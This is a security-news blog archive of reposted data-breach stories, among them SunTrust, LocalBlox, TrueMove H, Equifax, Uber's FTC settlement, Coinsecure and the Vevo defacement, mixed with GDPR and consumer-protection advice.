Category Archives: Data Breach

Former SunTrust employee stole data on 1.5 million clients

US commercial bank SunTrust has announced on Friday that they’ve fallen victim to insider threat, and that customer records of some 1.5 million of its customers had been extracted from its systems. What is known so far and has been shared with investors by the bank’s Chairman and CEO William Rogers, the insider was a former employee had tried to download customer data and hand it over to a “criminal third party.” Rogers said that … More

The post Former SunTrust employee stole data on 1.5 million clients appeared first on Help Net Security.

Health Stream left exposed online a database containing contact data for roughly 10,000 medics

An IT professional has discovered that the US healthcare company Health Stream left exposed online contact information for roughly 10,000 medics.

The IT expert Brian Wethern has discovered that the US healthcare company Health Stream left exposed online a database containing contact information for roughly 10,000 medics.

Wethern reported his discovery to Health Stream ten days ago, he explained that the data are hosted one of the websites that have been removed.

Records in the archive left open online includes last names of medics connected to Health Stream’s Neonatal Resuscitation Program, their email addresses, and ID numbers.Health Stream

The site hosting the medics’ records was taken offline shortly after Wethern reported the data leak, but even if the website is no more accessible, leaked data are still available in different online caches.

Leaked data could be used by threat actors to launch a spear phishing campaign against medics at Health Stream.

“What I found was a front-side database,” Wethern told El Reg. “I don’t need their passwords … because I have the front-side database.”

Wethern decided to disclose the data leak to warn of the risks of such kind of incidents and highlight the importance of reserving a budget for cybersecurity of IT infrastructure.

“Hire a basic researcher, first and foremost. Allow your company to budget for these types of intrusions,” Wethern added.

“And before this all happens, make sure to have a data breach summary in place. Be current with bug bounty programs, own up to your mistakes, and honor the fact that security researchers can be good people out to do good things.”

Health Stream did not comment the data leak.

Pierluigi Paganini

(Security Affairs – Health Stream, data leak)

The post Health Stream left exposed online a database containing contact data for roughly 10,000 medics appeared first on Security Affairs.

SunTrust unfaithful employee may have stolen data on 1.5 Million customers

SunTrust Banks Inc announced it discovered that a former employee may have attempted to download information on nearly 1.5 million clients and share it a criminal organization.

A former employee at the SunTrust Bank may have stolen data on 1.5 million clients,  including names, addresses, phone numbers, and account balances.

“The company became aware of potential theft by a former employee of information from some of its contact lists. Although the investigation is ongoing, SunTrust is proactively notifying approximately 1.5 million clients that certain information, such as name, address, phone number and certain account balances may have been exposed.” reads the press release published by the bank.

“The contact lists did not include personally identifying information, such as social security number, account number, PIN, User ID, password, or driver’s license information. SunTrust is also working with outside experts and coordinating with law enforcement.”

 

The bank said it believes the information doesn’t include personally identifiable information, such as social security numbers, account numbers, pins, user IDs, passwords or driver’s license numbers.

SunTrust is notifying approximately 1.5 million clients that certain information may have been exposed.

SunTrust

According to the Reuters agency, the unfaithful employee tried to download the client data a few weeks ago in an attempt to sell it to a criminal.

“Chief Executive Officer William Rogers brought the incident to light on a post-earnings call with analysts on Friday. He said the attempt to download client information was made six to eight weeks ago.” reported the Reuters.

SunTrust CEO William Rogers said that there was no indication of fraudulent activity using the exposed information, likely the data had not been sent outside the bank.

The SunTrust is now offering free identity protection services to all of its clients.

“SunTrust Banks, Inc. (NYSE: STI) is now offering Identity Protection for all current and new consumer clients at no cost on an ongoing basis. Experian IDnotify™ will be provided to those who sign up for the service.” continues the press release.

“The IDnotify product by Experian is being offered in addition to existing SunTrust security protocols: ongoing monitoring of accounts, FICO score program, alerts, tools and zero liability fraud protection.” 

Pierluigi Paganini

(Security Affairs – Bata Breach, cybercrime)

The post SunTrust unfaithful employee may have stolen data on 1.5 Million customers appeared first on Security Affairs.

5 things you can expect to happen after the GDPR deadline

After several years in the making and around 24 months since it was officially ratified, the EU General Data Protection Regulation (GDPR) is almost here. The most important thing to

The post 5 things you can expect to happen after the GDPR deadline appeared first on The Cyber Security Place.

Private Intelligence agency LocalBlox leaked 48 Million personal data records

The private intelligence agency LocalBlox has left unsecured online an AWS bucket containing 48 million records that were also harvested from Facebook, LinkedIn, and Twitter.

Oops … another data breach made the headlines and once again it was discovered by data leak hunters at Upguard. The private intelligence agency LocalBlox has left unsecured online an AWS bucket containing 48 million records that were collected in part from Facebook, LinkedIn, and Twitter.

“The UpGuard Cyber Risk Team can now confirm that a cloud storage repository containing information belonging to LocalBlox, a personal and business data search service, was left publicly accessible, exposing 48 million records of detailed personal information on tens of millions of individuals, gathered and scraped from multiple sources.” reads the blog post published by UpGuard.

The AWS S3 bucket was discovered by the popular expert Chris Vickery, director of cyber risk research at UpGuard, on February 18, it was exposed at the subdomain “lbdumps.”

The bucket contained a single 151.3 GB compressed file titled “final_people_data_2017_5_26_48m.json,” which, once decompressed, revealed a 1.2 TB ndjson (newline-delineated json) file.

Localblox data leak 2

The analysis of metadata in a header file allowed the researchers to attribute it to LocalBlox.

The records include names, physical addresses, dates of birth harvested from the social media. The first thought is for the recent Cambridge Analytica case.

“In the wake of the Facebook/Cambridge Analytica debacle, the importance of massive sets of psychographic data is becoming more and more apparent. The exposed LocalBlox dataset combines standard personal information like name and address, with data about the person’s internet usage, such as their LinkedIn histories and Twitter feeds.” continues the blog post.

The leaked data were collected from multiple sources and aggregated by IP addresses, for example, names, street addresses, dates of birth, job histories were harvested from LinkedIn, Facebook, Twitter, and Zillow real estate data.

Other sources are purchased databases and payday loan operators. This discovery demonstrates that many other entities scrape social media to gather user data for different purposes.

“Some are fairly unambiguous, pointing to aggregated content, purchased marketing databases, or even information caches sold by payday loan operators to businesses seeking marketing data. Other fields are more mysterious, such as a source field labeled “ex.”” continues the post.

“The presence of scraped data from social media sites like Facebook also highlights an important fact: all too often, data held by widely used websites can be targeted by unknown third parties seeking to monetize this information,”.

This case is double-shocking … the company not only harvests user data from social networks that are not able to detect its activity but is also failed security this data.

LocalBlox still hasn’t commented the data leak.

Pierluigi Paganini

(Security Affairs – LocalBlox, data leak)

The post Private Intelligence agency LocalBlox leaked 48 Million personal data records appeared first on Security Affairs.

As Cyber Risk Escalates, the C-Suite Must Take Action

This article was published on LinkedIn on April 19, 2018. You can read the original post here.

So far, 2018 has started out to be a very good year for cybercriminals. In the first week of April alone, restaurant chains and large department stores, some of America’s major retailers, disclosed significant data breaches. A multitude of government and healthcare organizations around the world have also been breached in the short three-and-a-half months of this year.

The trend is accelerating, and the disclosure of breaches has moved from weekly to nearly daily and sometimes several within a day. With the role C-suites and boards have in the management of the organization’s financial and reputational risks, the questions business leaders need to ask themselves are: How prepared is my organization, from top to bottom? Are the right people responsible for cyberthreat preparedness? How well does our C-suite and board understand the plan and the liability issues they may face in poor cybersecurity planning and incident management? How resilient is our organization in the aftermath of a significant breach?

C-Level and Board Responsibility for Cyber Risk — Still Over-Focused on IT

In one report from CSO Online called “The Current State of Cybercrime,” from a study conducted less than a year ago in the U.S., it was found that 6 out of 10 boards “believe cyber risk is an IT problem.” As long this belief exists, organization leaders will remain disengaged from the solutions and their role in supporting a robust cyber risk management strategy. With the number and severity of cyber risks growing exponentially, the magnitude of this risk needs to be better understood by many business leaders.

For those who still think cyber risk is an IT problem, I challenge them to consider this:

  • Cybercriminals are organized. They may have more ’employees’ than your security department and better tools than your IT department. Cybercrime is coordinated, automated and well-funded. The criminals are sharing tools and collaborating globally. Are you?
  • Your organization’s exposure to attacks (through mobile devices, in the cloud, through IoT) is growing exponentially. The days of simply building walls around your data center are over.
  • Criminals are opportunistically seeking your organization’s “inadvertent insider” who will blindly click on an attachment.The latest IBM X-Force Threat Intelligence Index report found that inadvertent insiders were responsible for more than 20 percent of the breaches in 2017, up from the previous year, and for more than two-thirds of total records compromised.
  • With a global skills shortage, other organizations are trying to poach your security employees and pay them better than you can. This will be a continuing problem. Open cybersecurity jobs are forecast to hit 1.5–2 million globally by 2020. So those enlisted to protect your organization may not be there next week or next month, including your security leadership.

Organizationwide Responsibility Is Critical in Security Strategy

Having a high-level, comprehensive cybersecurity strategy has never been more important, particularly in light of the digital transformation taking place across industries. Innovative new business models using new technologies like the Internet of Things (IoT), blockchain, mobile and cloud must include top-down recognition and protection from the tremendous cyber risks created if business-enabling innovations are not managed properly and systematically. Based on our experience and research, one thing is very clear: An effective security program, including risk identification, investments, plans and a well-coordinated incident response plan, is an organizationwide responsibility. C-suite executives that take cybersecurity seriously should implement best practices across the company. They need to:

  • Understand the true exposure. Have an accurate assessment of your cyber risk. Understand your “crown jewels,” both data and systems that are at risk. Where is the company implementing new digital initiatives such as cloud or blockchain or IoT? Have you considered the risk and how to manage those initiatives in a secure and compliant way? Have you tested your controls and decided which need strengthening?
  • Prioritize security investments in a way that links with this assessed risk.
  • Ensure that your program includes intelligence of new and emerging cyberthreats.
  • Implement a response and recovery plan to keep your business running in the event of cyberattack. This should be practiced routinely across the C-suite. Our experiences from our IBM Cyber Range show that small details (e.g., know who is in charge, how you will communicate and what are the roles of the team) can be the difference between success and failure in responding in a timely manner.
  • Remain vigilant. Keep challenging your approach. There must be a culture of cybersecurity awareness, essential training, and constant questioning and testing across the organization. The threat is constantly changing; security requires vigilance and a mindset that never assumes, “We’ve fixed security now.”

Plans Don’t Have to Be Perfect

The best plans are not perfect, but they are robust. Robust plans consider failure points, build in contingencies, and are designed to help us learn quickly and adjust. In cybersecurity planning, C-level executives and boards need to build a strategy that prepares the organization for the entire threat and risk management life cycle, from insight to determining priority vulnerabilities and potential threats, through to prevention, detection, and response and recovery. The response and recovery plans need be tested and practiced, something we are helping thousands of clients simulate in our Cyber Range.

In a highly publicized speech in 2014 titled “Boards of Directors, Corporate Governance and Cyber Risks: Sharpening the Focus,” then-Securities and Exchange Commission Chair Luis Aguilar made some critical recommendations:

  1. Boards should consider the NIST Cybersecurity Framework.
  2. Boards should consider structural changes to focus on cyber risk.
  3. Internal roles should be focused on cyber risk.
  4. Boards need to ensure preparedness for the inevitable cyberattack. This was some of the best advice then, and it’s still some of the best advice today.

Now, more than ever, it is critical that a cybersecurity strategy is viewed as more than a set of technologies and instead as an enterprisewide program, led from the top, that creates a comprehensive approach tailored to risk and compliance, governance, risk reduction and, above all, business resiliency.

Learn more about IBM X-Force Threat Management Services


The post As Cyber Risk Escalates, the C-Suite Must Take Action appeared first on Security Intelligence.

48 million people put at risk after firm that scraped info from social networks left it exposed for anyone to download

48 million people put at risk after firm that scraped info from social networks left it exposed for anyone to download

Chances are that you’ve never heard of Washington-based data firm LocalBlox. But that doesn’t mean that they haven’t heard of you. And it doesn’t mean that your personal information hasn’t been recklessly exposed through their sloppy disregard for the most basic security.

Read more in my article on the Hot for Security blog.

Facebook claims that Google and Twitter also collect users’ offline data

Facebook drags Google and Twitter into privacy scuffle

Recently, it was revealed that data analysis firm, Cambridge Analytica and Facebook were involved in a privacy data scandal wherein the former illegally harvested up to 87 million Facebook users’ personal data without their knowledge and consent.  Facebook allowed thousands of app developers to harvest data through third-party online games and quizzes.

This scandal raised concerns over users’ data privacy for which Facebook’s CEO Mark Zuckerberg had to face intensive questioning by U.S. lawmakers over the company’s collection and use of user data

The popular social media giant has now released a detailed blog post explaining how Facebook collects information about its users from the web even if you’re not a Facebook user or are logged out of your account. The blog post that was posted by David Baser, Facebook Product Management Director on Monday said that the post is a partial response to questions Zuckerberg was unable to answer during his Senate and Congressional hearings.

Baser pointed out in the blog post that not only Facebook even companies like Google, Twitter and Amazon use many of the same user data collection practices that the social media giant does.

He wrote, “Twitter, Pinterest, and LinkedIn all have similar Like and Share buttons to help people share things on their services. Google has a popular analytics service. And Amazon, Google, and Twitter all offer login features. These companies — and many others — also offer advertising services. In fact, most websites and apps send the same information to multiple companies each time you visit them.” Explaining how Facebook receives cookies, IP address, and browser info about users from other sites, he added, “When you see a YouTube video on a site that’s not YouTube, it tells your browser to request the video from YouTube. YouTube then sends it to you.”

Baser said the team on individuals for their own benefit. He wrote: “Apps and websites that use our services, such as the Like button or Facebook Analytics, send us information to make their content and ads better.”

In return, Facebook helps those websites serve up relevant and engaging ads or receive analytics to study how people use their services.

“When you visit a site or app that uses our services, we receive information even if you’re logged out or don’t have a Facebook account. This is because other apps and sites don’t know who is using Facebook,” Baser ad/d/ed.

“Our privacy policy explains in detail what we do with the information we receive — and we just updated the policy to make it easier to read. There are three main ways in which Facebook uses the information we get from other websites and apps: providing our services to these sites or apps; improving safety and security on Facebook; and enhancing our own products and services. I’ll share a little more about each of these, but first I want to be clear: We don’t sell people’s data. Period,” he concluded.

This appears to be perfectly justifiable for the social media giant. After Zuckerberg’s testimony in Congress last week, the company says it is working to be more transparent about what information Facebook has and how it is used. It says it wants to put its Facebook users in control.

The post Facebook claims that Google and Twitter also collect users’ offline data appeared first on TechWorm.

Equifax was not an isolated incident: the danger of Web apps

Nowadays it is possible to do almost anything from a Web browser, thanks to the expansion of cloud computing. Previously, users had to download, install and run programs for almost any task. Yet now, thanks to Web applications, simply having a browser is sufficient: we use Web applications to check email, make presentations, watch TV series and movies, edit images, etc., both at home and at work.

In the sights of cybercriminals

The increasing proliferation of Web applications has not gone unnoticed by cybercriminals. In recent months, these applications have gained popularity as a vector for attacks in numerous security incidents. The Verizon Data Breach Report 2017 highlights two figures that illustrate how popular these attacks have become: almost 3 out of 10 security breaches were caused by attacks on Web applications, and the rate of security breaches stemming from Web application security flaws increased by 300 percent between 2014 and 2016.

In a world that now goes around thanks to Web applications, those with inadequate security have become highly attractive targets for cybercriminals who want to find a simple way of infiltrating corporate networks. Although companies benefit in various ways from the capabilities of Web applications, the prevalence of security vulnerabilities is exposing companies to significant risks. The most revealing case of the negative consequences of not ensuring the security of such tools is that of Equifax.

 The Equifax case: the data of more than 147 million customers exposed

The security breach suffered by this credit reportiing company in September 2017 was one of the biggest data thefts in history. The company had until recently admitted that data of some 145.5 million users had been leaked, although they have now adjusted that figure up to 147.9 million.

The question is though, could such an attack have been prevented? The answer is simply, yes. Equifax left the door open to cybercriminals by not updating Apache Struts, an open-source Web application development framework. By not applying patches, a vulnerability allowed hackers to reveal the social security numbers, postal addresses and even driving license numbers of millions of people. This illustrates how the failure to follow basic security measures, such as patching the software used by a company, can have tremendous consequences. As Zane Lackey, a leading expert in Web application security explains, there are two lessons to be learned from the attack on Equifax. Firstly, that 99 percent of the time attacks happen due to common and simple errors: unpatched systems, weak passwords , malware on an endpoint, etc. And secondly, that security risks have shifted from the network to the application and endpoint layer.

The time has come to protect Web applications

If you don’t want your company to become the next Equifax, you should keep an eye out for these types of common attacks and take appropriate measures to keep them at bay.

According to Imperva, cross-site scripting or XSS vulnerabilities accounted for the highest number of Web application vulnerabilities in 2017. In fact, they have doubled in number compared to 2016. These attacks inject malicious scripts into vulnerable websites and allow attackers to steal sensitive data or even take control of devices. Imperva predicts that they will continue to be the most frequent attacks in 2018.

Another frequent attack is SQL injection. SQL programming language is so commonly used to manage and share information across applications, that cybercriminals see it as a perfect opportunity to perform attacks by entering their own SQL commands into databases. As many servers that store critical data from Web applications use SQL to manage communication with the data, hackers enter commands that allow them to edit, steal or delete this information.

In addition to the danger of external Web applications, internal Web applications also pose serious security risks, and they are an even easier target once an attacker has managed to gain access to the internal network.

To ensure the security of your company is not compromised by vulnerabilities in Web applications, the priority must be to design these applications securely from the outset. To this end, you can follow these tips: store raw data and encrypt it when rendering it, avoid non-secure frameworks (or update the ones you use, unlike Equifax!) and JavaScript calls that avoid encryption, etc. You should also provide developers with tools that let them see how their Web applications are being attacked, so they can react accordingly.

Another essential measure is to encrypt all data. WAFs (Web application firewalls) are not the panacea and they will not provide 100 percent protection, but encrypting information can frustrate potential attacks.

Finally, install a security solution that provides detailed visibility into all the activity that takes place on endpoints, continuously monitoring all running processes and applications. Panda Adaptive Defense protects you from the dangers of Web applications and prevents your company from becoming the next Equifax.

The post Equifax was not an isolated incident: the danger of Web apps appeared first on Panda Security Mediacenter.

Ransomware, healthcare and incident response: Lessons from the Allscripts attack

The actors behind SamSam launched a devastating attack against Allscripts in January, 2018. As Allscripts worked its incident response plan, things started to unravel. Here are the lessons learned. On

The post Ransomware, healthcare and incident response: Lessons from the Allscripts attack appeared first on The Cyber Security Place.

Large scale data breaches provide drive for DevSecOps investments

Breaches related to open source components have grown 50 percent since 2017, and an eye-opening 121 percent since 2014, according to a new survey from open source governance and DevSecOps

The post Large scale data breaches provide drive for DevSecOps investments appeared first on The Cyber Security Place.

Why organizations need business-centric data protection

A data protection team can help your enterprise take the best steps towards reducing the business risks and data breaches.Despite the recent surge in interest towards information security, we consistently

The post Why organizations need business-centric data protection appeared first on The Cyber Security Place.

TrueMove H, the biggest 4G mobile operator in Thailand suffered a data leak

TrueMove H, the biggest 4G mobile operator in Thailand suffered a data leak, 46000 people’s data store on an AWS bucked were left on accessible online, including driving licenses and passports.

Let’s speak about a new data breach, this time the victim is TrueMove H, the biggest 4G mobile operator in Thailand.

The operator exposed online customers personal data that were stored in an Amazon AWS S3 bucket.

The leaked data also includes scans of identity documents, the data were left accessible until April 12, when the company restricted the access.

The huge trove of data was discovered by security researcher Niall Merrigan that attempted to notify the issue to TrueMove H, but the operator did not respond.

Merrigan told El Reg that the AWS bucked contained 46,000 records for a total of 32GB.

The experts published a blog post on the case, he explained that tools like bucket stream and bucket-finder allow scanning the internet for open S3 AWS buckers.

Merrigan used the bucket-finder tool to find open S3 Buckets when noticed the one belonging to the TrueMove H.

“The output from bucket-finder showed several issues such as config files, source code and other potential information disclosures. Bucket finder only gets the top 1000 files via the AWS S3 API. To simplify things, I loaded the results into a small SQL database for analysis. I found all the sites that had 1000 files and did a quick visual scan to see what they contained and if there was a way to identify the owner if the need arose.” wrote the expert.

“One such owner was True Move H, the second largest mobile operator in Thailand,” 

TrueMove H

“Representatives of the telco initially told him to ring its head office when he asked for the contact details of a security response staffer before telling him his concerns had been passed on some two weeks later, after El Reg began asking questions on the back of Merrigan’s findings.reported El Reg.

TrueMove H has issued a statement to clarify that the data leak affected their subsidiary I True Mart. 

Pierluigi Paganini

(Security Affairs – TrueMove H, data leak)

The post TrueMove H, the biggest 4G mobile operator in Thailand suffered a data leak appeared first on Security Affairs.

Great Western Railway asks users to reset passwords due to a security breach

The British train company Great Western Rail announced it has suffered a security breach that affected at least 1,000 accounts out of more than a million.

The company owned by the FirstGroup transport business runs trains between London, Penzance, and Worcester

Great Western Rail is urging affected customers to change the password used to access the GWR.com portal, it also informed the UK Information Commissioner’s Office.

Attackers used credential stuffing to access the accounts, this means that hackers attempted to access the accounts by using credentials leaked from other data breaches.

The company is now extending the incident response measure to other account holders.

“We have identified unauthorised automated attempts to access a small number of GWR.com accounts over the past week,” a spokesman told the BBC.

“While we were able to shut this activity down quickly and contact those affected, a small proportion of accounts were successfully accessed.”

“The success rate of the automated logins was extremely low, suggesting any passwords used were likely harvested elsewhere,”

In the following image is reported a data breach notification received by a customer.

GWR notification

The messages inform users that Great Western Rail has reset all GWR.com passwords as a precaution.

“To ensure the security of your personal information you will need to do this when you next log in to the GWR.com website.” reads the message.

“You should use a unique password for each of your accounts for security, and we recommend you review all of your accounts for maximum security, and we recommend you review all your online passwords and change any that are the same.”

 

If you are a Great Western Rail user change your password and change the password for each website where you used the same credentials.

As usual, let me suggest using a strong password and enable two-factor authentication when available.

Pierluigi Paganini

(Security Affairs – Great Western Rail, hacking)

The post Great Western Railway asks users to reset passwords due to a security breach appeared first on Security Affairs.

Uber agrees to new FTC settlement over 2016 data breach

Uber agrees to a new settlement with the Federal Trade Commission over the massive 2016 data breach, the authorities could assign civil penalties against the company if it will fail to share incident data with FTC.

Uber agrees to a new settlement with the Federal Trade Commission over the massive 2016 data breach.

“Uber Technologies, Inc. has agreed to expand the proposed settlement it reached with the Federal Trade Commission last year over charges that the ride-sharing company deceived consumers about its privacy and data security practices.” states the FTC.

“Due to Uber’s misconduct related to the 2016 breach, Uber will be subject to additional requirements. Among other things, the revised settlement could subject Uber to civil penalties if it fails to notify the FTC of certain future incidents involving unauthorized access of consumer information.”

In November 2017, the Uber CEO Dara Khosrowshahi announced that hackers broke into the company database and accessed the personal data of 57 million of its users, the disconcerting revelation was that the company covered up the hack for more than a year.

The attackers accessed also the names and driver’s license numbers of roughly 600,000 of its drivers in the United States.

The hack happened in 2016, it was easy for hackers that according to a report published by Bloomberg, obtained credentials from a private GitHub site used by the company development team. The hackers tried to blackmail Uber and demanded $100,000 from the company in exchange for avoiding publish the stolen data.

Rather than to notify the data breach to customers and law enforcement as is required by California’s data security breach notification law, the chief of information security Joe Sullivan ordered to pay the ransom and to cover the story destroying any evidence. The payout was disguised as a bug bounty prize complete with non-disclosure agreements signed

uber

In 2017 the FTC charged the company for deceiving customers with its privacy and data security practices.

The first settlement dated back August 2017, according to the FTC, the company failed to apply security measures to protect customers and drivers data, later while investigating the settlement, the Commission discovered that the company did not disclose the 2016 data breach before 2017.

According to the new settlement with the Federal Trade Commission, Uber is obliged to disclose any future breach affecting consumer data and share reports from required third-party audits of its privacy program.

The company must maintain records related to bug bounty activities, the authorities could assign civil penalties against the company in case it will fail to implement the above actions.

After misleading consumers about its privacy and security practices, Uber compounded its misconduct by failing to inform the Commission that it suffered another data breach in 2016 while the Commission was investigating the company’s strikingly similar 2014 breach,” said Acting FTC Chairman Maureen K. Ohlhausen. “The strengthened provisions of the expanded settlement are designed to ensure that Uber does not engage in similar misconduct in the future.

Pierluigi Paganini

(Security Affairs – FTC settlement, Uber data breach)

The post Uber agrees to new FTC settlement over 2016 data breach appeared first on Security Affairs.

$3.3 Million stolen from main Coinsecure Bitcoin wallet

Cryptocurrency exchange Coinsecure, India’s second exchange, announced that it has suffered a severe issue, 438 bitcoin, $3,3 million worth of bitcoin

Cryptocurrency exchange Coinsecure, India’s second exchange, announced that it has suffered a severe issue, 438 bitcoin, $3,3 million worth of bitcoin, have been transferred from the main wallet to an account that is not under their control.

CEO Mohit Kalra said that only he the Chief Strategist officer (CSO) Dr. Amitabh Saxena had private keys to the exchange’s main wallet.

“The current issue points towards losses caused during an exercise to extract BTG to distribute to our customers. Our Chief Strategist officer (CSO) Dr. Amitabh Saxena was extracting BTG and he claims that the funds have been lost in the process during the extraction of the private keys.” reads the statement published by Coinsecure. 

According to the CEO of Coinsecure, the CSO is responsible for the transfer, the company posted two imaged on the websites containing company statement signed by the Coinsecure team and a scanned copy of a police complaint filed by Coinsecure CEO Mohit Kalra.

coinsecure hack

The Coinsecure CEO excluded the transfer was the result of a hack and accused the CSO, but Dr. Saxena denied any involvement in the case and informed Coinsecure that the funds “were stolen from company’s Bitcoin wallet due to some attack.”.

“Our system itself has never been compromised or hacked, and the current issue points towards losses caused during an exercise to extract BTG [Bitcoin Gold] to distribute to our customers, ” the Coinsecure team wrote in its statement

“Our CSO, Dr. Amitabh Saxena, was extracting BTG and he claims that funds have been lost in the process during the extraction of the private keys,” Coinsecure added.

“[he] making a false story to divert [his] attention and might have a role to play in this entire incident.”

The CEO is asking local police to seize the Saxena’s passport because he fears that the employee “might fly out of the country soon.”

Pierluigi Paganini

(Security Affairs – Bitcoin, hacking)

The post $3.3 Million stolen from main Coinsecure Bitcoin wallet appeared first on Security Affairs.

Ransomware Was the Most Prevalent Form of Malware in 2017

A recent data breach investigations study revealed that ransomware was the most prevalent variety of malware in 2017.

According to Verizon’s “2018 Data Breach Investigations Report (DBIR),” security professionals spotted cryptolockers in 39 percent of security incidents that involved malware as an attack variety. This attack type was more prevalent than spyware, banking Trojans and other forms of malicious software over the course of the year.

Ransomware in Review

For the report, Verizon analyzed over 53,000 security incidents, including 2,216 data breaches, submitted from contributors in more than five dozen countries. The goal of the study was to identify trends in those events and inform organizations about the threats they’re up against as they plan their defense strategies.

The researchers ranked ransomware as the fifth-most prevalent action variety with 787 incidents, and noted that malware was utilized as a tactic in 30 percent of security events.

Gabe Bassett, senior information security data scientist at Verizon and co-author of the report, said he tracked ransomware’s growth since it first appeared in the 2013 edition of the DBIR. During that span of time, he witnessed ransomware activity double year over year on at least two separate occasions.

“The reason we’re seeing this incredible prevalence is ransomware is a great value proposition for the attacker,” Bassett told TechRepublic. “They don’t have to do a lot of the complex work. They just drop a piece of malware and then let it run.”

Ransomware activity also grew because of its flexibility, allowing cybercriminals to launch campaigns against targets that are more lucrative than users’ personal devices. In fact, Verizon noted a rise in ransomware operations targeting enterprises’ file systems and databases.

An Industry Perspective

Ransomware was more prevalent in some industries than others. Healthcare came in at the top, with cryptolockers accounting for 85 percent of all malware varieties over the course of the year. The May 2017 outbreak of WannaCry, which claimed 34 percent of the U.K.’s National Health Service (NHS) hospital trusts as victims, according to the U.K. Department of Health and Social Care, likely helped drive up this figure.

But Bassett and his fellow researchers revealed that number might misrepresent the realities of data protection in the healthcare sector. The Verizon report noted that medical organizations are bound by federal regulations to report ransomware attacks as data breaches and not instances of data risk. Therefore, it’s impossible to know whether hospitals and other healthcare centers are more susceptible to ransomware than organizations in other industries or if higher reporting standards are to blame.

The report’s authors advised organizations to take certain steps to protect themselves against data breaches, including implementing two-factor authentication (2FA), patching software vulnerabilities and conducting ongoing security awareness training with employees.

The post Ransomware Was the Most Prevalent Form of Malware in 2017 appeared first on Security Intelligence.

2.6 billion records were stolen, lost or exposed worldwide in 2017

Gemalto released the latest findings of the Breach Level Index, revealing that 2.6 billion records were stolen, lost or exposed worldwide in 2017, an 88% increase from 2016. While data breach incidents decreased by 11%, 2017 was the first year publicly disclosed breaches surpassed more than two billion compromised data records since the Breach Level Index began tracking data breaches in 2013. Over the past five years, nearly 10 billion records have been lost, stolen … More

The post 2.6 billion records were stolen, lost or exposed worldwide in 2017 appeared first on Help Net Security.

U.S. Appeals Court Says Barnes & Noble Data Breach Victims Can Seek Damages

A U.S. federal appeals court has ruled that victims of a payment card data breach at Barnes & Noble can seek damages against the national bookseller. According to Reuters, the decision came on 11 April when the 7th U.S. Circuit Court of Appeals in Chicago said that Heather Dieffenbach of California and Susan Winstead of […]… Read More

The post U.S. Appeals Court Says Barnes & Noble Data Breach Victims Can Seek Damages appeared first on The State of Security.

How to Comply with GDPR

In a little over a month – on May 25, to be precise – the EU’s General Data Protection Regulation (GDPR) will take effect, and if your company is not

The post How to Comply with GDPR appeared first on The Cyber Security Place.

Service Provider [24]7.ai Breached, Leaking Customer Data from Delta Airlines, Sears, Kmart, and Best Buy

A huge part of modern-day customer service is the chat functionality, which allows customers to converse easily with representatives of the organization in order to find a solution to their problem. This chat functionality is often a service offered by a third-party provider. And just last week, one of these service providers, [24]7.ai, reported that an unspecified cyberattack affected online payment data collected by a “small number of our client companies.” A few of these companies include Delta Airlines, Sears, Kmart, and Best Buy.

The breach was the result of an unspecified malware attack on the service’s chat tool, which occurred between Sept. 26 and Oct. 12, 2017. The malware permitted cybercriminals to obtain unauthorized access to customer data, including payment card numbers, CVV numbers, and expiration dates, in addition to customers’ names and addresses.

Delta Airlines, Sears, Kmart, and Best Buy all have not yet determined how many customers have been impacted so far. But it is believed to be totaling up to hundreds of thousands. So, for those who have been affected – what are the next steps? Start by following these security tips here:

  • Place a Fraud Alert. If you know your data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report, so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account. Then, make sure you correct your credit report by filing a dispute with each of the three credit bureaus.
  • Freeze Your Credit. This allows you to seal your credit reports so no one else can take out new accounts or loans in your name. You can do this without impacting your existing lines of credit, such as credit cards. If you want to apply for services or open new accounts, you can temporarily “unfreeze” your credit using a personal identification code only you have.
  • Consider an identity theft protection solution. With these breaches, consumers are faced with the possibility of identity theft. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Service Provider [24]7.ai Breached, Leaking Customer Data from Delta Airlines, Sears, Kmart, and Best Buy appeared first on McAfee Blogs.

Ransomware incidents double, threatening companies of all sizes

Ransomware is the most common malware used when it comes to breaches, according to Verizon’s 2018 Data Breach Investigations Report. Verizon’s 2018 Data Breach Investigations Report (DBIR) is out, and

The post Ransomware incidents double, threatening companies of all sizes appeared first on The Cyber Security Place.

Top VEVO Music videos Including ‘Despacito’ defaced by hackers

Some of the most popular music VEVO videos on YouTube, including the world’s most popular video ‘Despacito’ has been hacked by a duo calling themselves Prosox and Kuroi’SH.

Some of the most popular music videos on YouTube, including the world’s most popular YouTube video ‘Despacito’ has been hacked.

Popular videos of  pop stars like Shakira, Drake, Selena Gomez, Adele, Taylor Swift, and Calvin Harris were replaced by hackers that spread the message “Free Palestine.”

Despacito, the Luis Fonsi’s mega-hit that was watched five billion times was replaced by an image of a group of armed men dressed in hooded sweatshirts that appeared to come from the Spanish series “Money Heist.”

The videos were hacked by a duo calling themselves Prosox and Kuroi’SH.

All the hacked videos are on singers’ accounts belonging to the VEVO platform that is owned by a group of some of the biggest music corporations.

According to YouTube, the problem doesn’t affect its platform but Vevo.

“After seeing unusual upload activity on a handful of Vevo channels, we worked quickly with our partner to disable access while they investigate the issue,” a YouTube spokesperson said.

Vevo confirmed a security breach on systems.

“We are working to reinstate all videos affected and our catalog to be restored to full working order. We are continuing to investigate the source of the breach,” it said in a statement.

The alleged hacker @ProsoxW3b started posting severs Tweets first saying it has hacked for fun and not for profit.

despacito prosox-tweet

Pierluigi Paganini

(Security Affairs – Despacito Hacked, VEVO)

The post Top VEVO Music videos Including ‘Despacito’ defaced by hackers appeared first on Security Affairs.

Cybersecurity: How Do You Build a Transformational Dynamic?

At the end of a keynote speech I gave at the excellent CIO WaterCooler LIVE! Event in London on 28th September 2017 on security organization, governance and creating the dynamics

The post Cybersecurity: How Do You Build a Transformational Dynamic? appeared first on The Cyber Security Place.

Sodexo Filmology data breach – Users need cancel their credit cards

Sodexo food services and facilities management company notified a number of customers that it was the victim of a targeted attack on its cinema vouchers platform Sodexo Filmology.

Sodexo food services and facilities management company notified a number of customers that it was the victim of a targeted attack on its cinema vouchers platform, Filmology and it is urging them to cancel their credit cards.

The service rewards UK employee via discounted cinema tickets, the website was taken down in response to the incident “to eliminate any further potential risk” to consumers and to protect their data.

Sodexo Filmology

